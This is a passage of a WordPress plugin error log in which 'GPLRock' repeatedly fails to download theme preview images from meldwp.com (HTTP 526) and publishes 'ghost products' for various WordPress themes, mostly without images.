onekorse-lms-education-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:27:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/onekorse---lms-education-theme-30175.webp for product onekorse-lms-education-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:27:01 UTC] GPLRock WARNING: Image download failed for product onekorse-lms-education-theme. URL: https://meldwp.com/wp-content/uploads/onekorse---lms-education-theme-30175.webp [06-Apr-2026 06:27:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: onekorse-lms-education-theme [06-Apr-2026 06:27:01 UTC] GPLRock: Image download failed for product lounge-clean-elegant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:27:03 UTC] GPLRock: Image download failed for product lounge-clean-elegant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:27:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lounge---clean-elegant-wordpress-theme-5722.webp for product lounge-clean-elegant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:27:05 UTC] GPLRock: Image download failed for product lounge-clean-elegant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:27:07 UTC] GPLRock: Image download failed for product lounge-clean-elegant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:27:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lounge---clean-elegant-wordpress-theme-5722.webp for product lounge-clean-elegant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:27:10 UTC] GPLRock WARNING: Image download failed for product lounge-clean-elegant-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/lounge---clean-elegant-wordpress-theme-5722.webp [06-Apr-2026 06:27:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lounge-clean-elegant-wordpress-theme [06-Apr-2026 06:27:10 UTC] GPLRock: Image download failed for product cresta-it-solutions-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:27:12 UTC] GPLRock: Image download failed for product cresta-it-solutions-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:27:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cresta---it-solutions--technology-wordpress-theme-13984.webp for product cresta-it-solutions-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:27:14 UTC] GPLRock: Image download failed for product cresta-it-solutions-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:27:16 UTC] GPLRock: Image download failed for product cresta-it-solutions-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:27:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cresta---it-solutions--technology-wordpress-theme-13984.webp for product cresta-it-solutions-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:27:18 UTC] GPLRock WARNING: Image download failed for product cresta-it-solutions-technology-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cresta---it-solutions--technology-wordpress-theme-13984.webp [06-Apr-2026 06:27:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cresta-it-solutions-technology-wordpress-theme [06-Apr-2026 06:27:18 UTC] GPLRock: Image download failed for product the-artist-clean-responsive-portfolio-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:27:20 UTC] GPLRock: Image download failed for product the-artist-clean-responsive-portfolio-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:27:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-artist---clean-responsive-portfolio-wordpress-19927.webp for product the-artist-clean-responsive-portfolio-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:27:23 UTC] GPLRock: Image download failed for product the-artist-clean-responsive-portfolio-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:27:25 UTC] GPLRock: Image download failed for product the-artist-clean-responsive-portfolio-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:27:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-artist---clean-responsive-portfolio-wordpress-19927.webp for product the-artist-clean-responsive-portfolio-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:27:27 UTC] GPLRock WARNING: Image download failed for product the-artist-clean-responsive-portfolio-wordpress. URL: https://meldwp.com/wp-content/uploads/the-artist---clean-responsive-portfolio-wordpress-19927.webp [06-Apr-2026 06:27:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: the-artist-clean-responsive-portfolio-wordpress [06-Apr-2026 06:27:27 UTC] GPLRock: Image download failed for product andier-responsive-one-multi-page-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:27:29 UTC] GPLRock: Image download failed for product andier-responsive-one-multi-page-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:27:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/andier---responsive-one--multi-page-portfolio-theme-1128.webp for product andier-responsive-one-multi-page-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:27:31 UTC] GPLRock: Image download failed for product andier-responsive-one-multi-page-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:27:33 UTC] GPLRock: Image download failed for product andier-responsive-one-multi-page-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:27:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/andier---responsive-one--multi-page-portfolio-theme-1128.webp for product andier-responsive-one-multi-page-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:27:35 UTC] GPLRock WARNING: Image download failed for product andier-responsive-one-multi-page-portfolio-theme. URL: https://meldwp.com/wp-content/uploads/andier---responsive-one--multi-page-portfolio-theme-1128.webp [06-Apr-2026 06:27:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: andier-responsive-one-multi-page-portfolio-theme [06-Apr-2026 06:27:36 UTC] GPLRock: Image download failed for product ecomm-the-powerful-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:27:38 UTC] GPLRock: Image download failed for product ecomm-the-powerful-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:27:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ecomm---the-powerful-woocommerce-theme-2570.webp for product ecomm-the-powerful-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:27:40 UTC] GPLRock: Image download failed for product ecomm-the-powerful-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:27:42 UTC] GPLRock: Image download failed for product ecomm-the-powerful-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:27:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ecomm---the-powerful-woocommerce-theme-2570.webp for product ecomm-the-powerful-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:27:44 UTC] GPLRock WARNING: Image download failed for product ecomm-the-powerful-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/ecomm---the-powerful-woocommerce-theme-2570.webp [06-Apr-2026 06:27:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ecomm-the-powerful-woocommerce-theme [06-Apr-2026 06:27:44 UTC] GPLRock: Image downloaded successfully for product femina-health-womens-health-fertility-clinic-medical-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f251ca38.webp [06-Apr-2026 06:27:44 UTC] GPLRock: Using pre-downloaded image for product femina-health-womens-health-fertility-clinic-medical-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f251ca38.webp [06-Apr-2026 06:27:44 UTC] GPLRock: Ghost product published with image - Product ID: femina-health-womens-health-fertility-clinic-medical-wordpress-theme [06-Apr-2026 06:27:44 UTC] GPLRock: Image download failed for product sacreva-church-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:27:46 UTC] GPLRock: Image download failed for product sacreva-church-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:27:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sacreva---church-wordpress-theme-27724.webp for product sacreva-church-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:27:49 UTC] GPLRock: Image download failed for product sacreva-church-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:27:51 UTC] GPLRock: Image download failed for product sacreva-church-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:27:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sacreva---church-wordpress-theme-27724.webp for product sacreva-church-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:27:53 UTC] GPLRock WARNING: Image download failed for product sacreva-church-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/sacreva---church-wordpress-theme-27724.webp [06-Apr-2026 06:27:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sacreva-church-wordpress-theme [06-Apr-2026 06:27:53 UTC] GPLRock: Image download failed for product elizabeth-a-responsive-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:27:55 UTC] GPLRock: Image download failed for product elizabeth-a-responsive-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:27:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elizabeth---a-responsive-wordpress-blog-theme-25314.webp for product elizabeth-a-responsive-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:27:57 UTC] GPLRock: Image download failed for product elizabeth-a-responsive-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:27:59 UTC] GPLRock: Image download failed for product elizabeth-a-responsive-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:28:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elizabeth---a-responsive-wordpress-blog-theme-25314.webp for product elizabeth-a-responsive-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:28:01 UTC] GPLRock WARNING: Image download failed for product elizabeth-a-responsive-wordpress-blog-theme. URL: https://meldwp.com/wp-content/uploads/elizabeth---a-responsive-wordpress-blog-theme-25314.webp [06-Apr-2026 06:28:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: elizabeth-a-responsive-wordpress-blog-theme [06-Apr-2026 06:39:12 UTC] GPLRock: Image download failed for product holistiq-holistic-wellness-alternative-medicine-fse-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:39:14 UTC] GPLRock: Image download failed for product holistiq-holistic-wellness-alternative-medicine-fse-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:39:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/holistiq--holistic-wellness--alternative-medicine-fse-wordpress-theme-8992.webp for product holistiq-holistic-wellness-alternative-medicine-fse-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:39:16 UTC] GPLRock: Image download failed for product holistiq-holistic-wellness-alternative-medicine-fse-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:39:19 UTC] GPLRock: Image download failed for product holistiq-holistic-wellness-alternative-medicine-fse-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:39:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/holistiq--holistic-wellness--alternative-medicine-fse-wordpress-theme-8992.webp for product holistiq-holistic-wellness-alternative-medicine-fse-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:39:21 UTC] GPLRock WARNING: Image download failed for product holistiq-holistic-wellness-alternative-medicine-fse-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/holistiq--holistic-wellness--alternative-medicine-fse-wordpress-theme-8992.webp [06-Apr-2026 06:39:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: holistiq-holistic-wellness-alternative-medicine-fse-wordpress-theme [06-Apr-2026 06:39:21 UTC] GPLRock: Image download failed for product livi-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:39:23 UTC] GPLRock: Image download failed for product livi-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:39:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/livi---education-wordpress-theme-19761.webp for product livi-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:39:25 UTC] GPLRock: Image download failed for product livi-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:39:27 UTC] GPLRock: Image download failed for product livi-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:39:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/livi---education-wordpress-theme-19761.webp for product livi-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:39:29 UTC] GPLRock WARNING: Image download failed for product livi-education-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/livi---education-wordpress-theme-19761.webp [06-Apr-2026 06:39:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: livi-education-wordpress-theme [06-Apr-2026 06:39:29 UTC] GPLRock: Image download failed for product arredo-clean-furniture-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:39:32 UTC] GPLRock: Image download failed for product arredo-clean-furniture-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:39:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/arredo---clean-furniture-store-wordpress-theme-15922.webp for product arredo-clean-furniture-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:39:34 UTC] GPLRock: Image download failed for product arredo-clean-furniture-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:39:36 UTC] GPLRock: Image download failed for product arredo-clean-furniture-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:39:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/arredo---clean-furniture-store-wordpress-theme-15922.webp for product arredo-clean-furniture-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:39:38 UTC] GPLRock WARNING: Image download failed for product arredo-clean-furniture-store-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/arredo---clean-furniture-store-wordpress-theme-15922.webp [06-Apr-2026 06:39:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: arredo-clean-furniture-store-wordpress-theme [06-Apr-2026 06:39:38 UTC] GPLRock: Image download failed for product ayro-tech-startup-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:39:40 UTC] GPLRock: Image download failed for product ayro-tech-startup-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:39:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ayro---tech-startup-wordpress-theme-24575.webp for product ayro-tech-startup-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:39:42 UTC] GPLRock: Image download failed for product ayro-tech-startup-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:39:44 UTC] GPLRock: Image download failed for product ayro-tech-startup-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:39:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ayro---tech-startup-wordpress-theme-24575.webp for product ayro-tech-startup-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:39:46 UTC] GPLRock WARNING: Image download failed for product ayro-tech-startup-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ayro---tech-startup-wordpress-theme-24575.webp [06-Apr-2026 06:39:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ayro-tech-startup-wordpress-theme [06-Apr-2026 06:39:47 UTC] GPLRock: Image download failed for product caston-furniture-shop-by-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:39:49 UTC] GPLRock: Image download failed for product caston-furniture-shop-by-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:39:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/caston---furniture-shop-by-elementor-23479.webp for product caston-furniture-shop-by-elementor after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:39:51 UTC] GPLRock: Image download failed for product caston-furniture-shop-by-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:39:53 UTC] GPLRock: Image download failed for product caston-furniture-shop-by-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:39:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/caston---furniture-shop-by-elementor-23479.webp for product caston-furniture-shop-by-elementor after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:39:55 UTC] GPLRock WARNING: Image download failed for product caston-furniture-shop-by-elementor. URL: https://meldwp.com/wp-content/uploads/caston---furniture-shop-by-elementor-23479.webp [06-Apr-2026 06:39:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: caston-furniture-shop-by-elementor [06-Apr-2026 06:39:55 UTC] GPLRock: Image download failed for product micar-auto-dealer-rtl-woocommerce-wordpress-for-car-and-moto-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:39:57 UTC] GPLRock: Image download failed for product micar-auto-dealer-rtl-woocommerce-wordpress-for-car-and-moto-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:40:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/micar---auto-dealer-rtl-woocommerce-wordpress-for-car-and-moto-theme-8276.webp for product micar-auto-dealer-rtl-woocommerce-wordpress-for-car-and-moto-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:40:00 UTC] GPLRock: Image download failed for product micar-auto-dealer-rtl-woocommerce-wordpress-for-car-and-moto-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:40:02 UTC] GPLRock: Image download failed for product micar-auto-dealer-rtl-woocommerce-wordpress-for-car-and-moto-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:40:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/micar---auto-dealer-rtl-woocommerce-wordpress-for-car-and-moto-theme-8276.webp for product micar-auto-dealer-rtl-woocommerce-wordpress-for-car-and-moto-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:40:04 UTC] GPLRock WARNING: Image download failed for product micar-auto-dealer-rtl-woocommerce-wordpress-for-car-and-moto-theme. URL: https://meldwp.com/wp-content/uploads/micar---auto-dealer-rtl-woocommerce-wordpress-for-car-and-moto-theme-8276.webp [06-Apr-2026 06:40:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: micar-auto-dealer-rtl-woocommerce-wordpress-for-car-and-moto-theme [06-Apr-2026 06:40:04 UTC] GPLRock: Image download failed for product mersal-one-page-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:40:06 UTC] GPLRock: Image download failed for product mersal-one-page-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:40:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mersal---one-page-multipurpose-wordpress-theme-31391.webp for product mersal-one-page-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:40:09 UTC] GPLRock: Image download failed for product mersal-one-page-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:40:11 UTC] GPLRock: Image download failed for product mersal-one-page-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:40:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mersal---one-page-multipurpose-wordpress-theme-31391.webp for product mersal-one-page-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:40:13 UTC] GPLRock WARNING: Image download failed for product mersal-one-page-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/mersal---one-page-multipurpose-wordpress-theme-31391.webp [06-Apr-2026 06:40:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mersal-one-page-multipurpose-wordpress-theme [06-Apr-2026 06:40:13 UTC] GPLRock: Image download failed for product line-agency-interior-design-architecture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:40:15 UTC] GPLRock: Image download failed for product line-agency-interior-design-architecture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:40:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/line-agency--interior-design--architecture-wordpress-theme-27744.webp for product line-agency-interior-design-architecture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:40:17 UTC] GPLRock: Image download failed for product line-agency-interior-design-architecture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:40:19 UTC] GPLRock: Image download failed for product line-agency-interior-design-architecture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:40:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/line-agency--interior-design--architecture-wordpress-theme-27744.webp for product line-agency-interior-design-architecture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:40:22 UTC] GPLRock WARNING: Image download failed for product line-agency-interior-design-architecture-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/line-agency--interior-design--architecture-wordpress-theme-27744.webp [06-Apr-2026 06:40:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: line-agency-interior-design-architecture-wordpress-theme [06-Apr-2026 06:40:22 UTC] GPLRock: Image download failed for product enardo-blog-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:40:24 UTC] GPLRock: Image download failed for product enardo-blog-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:40:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/enardo---blog--magazine-wordpress-theme-1014.webp for product enardo-blog-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:40:26 UTC] GPLRock: Image download failed for product enardo-blog-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:40:28 UTC] GPLRock: Image download failed for product enardo-blog-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:40:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/enardo---blog--magazine-wordpress-theme-1014.webp for product enardo-blog-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:40:30 UTC] GPLRock WARNING: Image download failed for product enardo-blog-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/enardo---blog--magazine-wordpress-theme-1014.webp [06-Apr-2026 06:40:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: enardo-blog-magazine-wordpress-theme [06-Apr-2026 06:40:30 UTC] GPLRock: Image download failed for product aria-pure-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:40:32 UTC] GPLRock: Image download failed for product aria-pure-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:40:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aria---pure-business-wordpress-theme-26224.webp for product aria-pure-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:40:35 UTC] GPLRock: Image download failed for product aria-pure-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:40:37 UTC] GPLRock: Image download failed for product aria-pure-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:40:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aria---pure-business-wordpress-theme-26224.webp for product aria-pure-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:40:39 UTC] GPLRock WARNING: Image download failed for product aria-pure-business-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/aria---pure-business-wordpress-theme-26224.webp [06-Apr-2026 06:40:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: aria-pure-business-wordpress-theme [06-Apr-2026 06:54:34 UTC] GPLRock: Image download failed for product budapest-minimal-multi-purpose-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:54:36 UTC] GPLRock: Image download failed for product budapest-minimal-multi-purpose-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:54:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/budapest--minimal-multi-purpose-portfolio-wordpress-theme-3456.webp for product budapest-minimal-multi-purpose-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:54:38 UTC] GPLRock: Image download failed for product budapest-minimal-multi-purpose-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:54:40 UTC] GPLRock: Image download failed for product budapest-minimal-multi-purpose-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:54:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/budapest--minimal-multi-purpose-portfolio-wordpress-theme-3456.webp for product budapest-minimal-multi-purpose-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:54:42 UTC] GPLRock WARNING: Image download failed for product budapest-minimal-multi-purpose-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/budapest--minimal-multi-purpose-portfolio-wordpress-theme-3456.webp [06-Apr-2026 06:54:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: budapest-minimal-multi-purpose-portfolio-wordpress-theme [06-Apr-2026 06:54:42 UTC] GPLRock: Image download failed for product anymag-magazine-style-wordpress-blog (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:54:44 UTC] GPLRock: Image download failed for product anymag-magazine-style-wordpress-blog (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:54:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/anymag---magazine-style-wordpress-blog-9767.webp for product anymag-magazine-style-wordpress-blog after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:54:47 UTC] GPLRock: Image download failed for product anymag-magazine-style-wordpress-blog (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:54:49 UTC] GPLRock: Image download failed for product anymag-magazine-style-wordpress-blog (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:54:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/anymag---magazine-style-wordpress-blog-9767.webp for product anymag-magazine-style-wordpress-blog after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:54:51 UTC] GPLRock WARNING: Image download failed for product anymag-magazine-style-wordpress-blog. URL: https://meldwp.com/wp-content/uploads/anymag---magazine-style-wordpress-blog-9767.webp [06-Apr-2026 06:54:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: anymag-magazine-style-wordpress-blog [06-Apr-2026 06:54:51 UTC] GPLRock: Image download failed for product jina-celebration-agency-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:54:53 UTC] GPLRock: Image download failed for product jina-celebration-agency-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:54:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jina---celebration-agency-theme-19969.webp for product jina-celebration-agency-theme after 3 